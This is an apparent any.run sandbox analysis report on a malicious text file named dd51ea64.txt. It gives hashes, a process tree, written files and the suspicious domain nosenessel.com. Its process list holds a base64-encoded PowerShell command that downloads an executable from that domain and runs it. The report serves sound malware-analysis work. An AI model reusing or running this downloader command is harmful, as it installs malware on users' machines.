File name: | dd51ea64.txt |
Full analysis: | https://app.any.run/tasks/547c8a26-7e7b-47fd-b694-ce80366e94e8 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 14:50:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | E8BAEB2BC815D11F13FFDE245763AA26 |
SHA1: | 3615A14164787B3F93A14682214EB4728780FFDA |
SHA256: | D5CACC132E8848F233C37FA5904147BE00DEFC53C14778CFEC483787EDE155B6 |
SSDEEP: | 48:hy0aOW/KjGPIyBrBEEgUXJGqyiq+bIgCuCQpHagCvgVvvQqmOjEInZtRkqc2vvQv:c5/IybEEhXARBKISZpxLlJNvmqpJNva |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2960 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\dd51ea64.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2344 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | explorer.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Exit code: 1 Version: 15.23.20070.215641 | ||||
3716 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe Acrobat Reader DC Exit code: 1 Version: 15.23.20070.215641 | ||||
2716 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2416 | powershELL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAG8AcwBlAG4AZQBzAHMAZQBsAC4AYwBvAG0ALwBXAEUAUwAvAGYAYQB0AG8AZwAuAHAAaABwAD8AbAA9AG4AaQB2AGUAMgAuAHgAYQBwACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABkAGQANQAxAGUAYQA2ADQALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAZABkADUAMQBlAGEANgA0AC4AZQB4AGUAJwA7ACAARQB4AGkAdAA7ACAA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N4HEITZFR52KZ4D8C1UC.temp | — | |
MD5:— | SHA256:— | |||
2416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF250655.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3716 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat | binary | |
MD5:E724D72264DA270D3DA2293F7579F7CC | SHA256:3516E878C6EF18D6D7DF8F3D01B63D7E7E87C865D822F62358B96C0576456975 |
Domain | IP | Reputation |
---|---|---|
nosenessel.com |
| suspicious |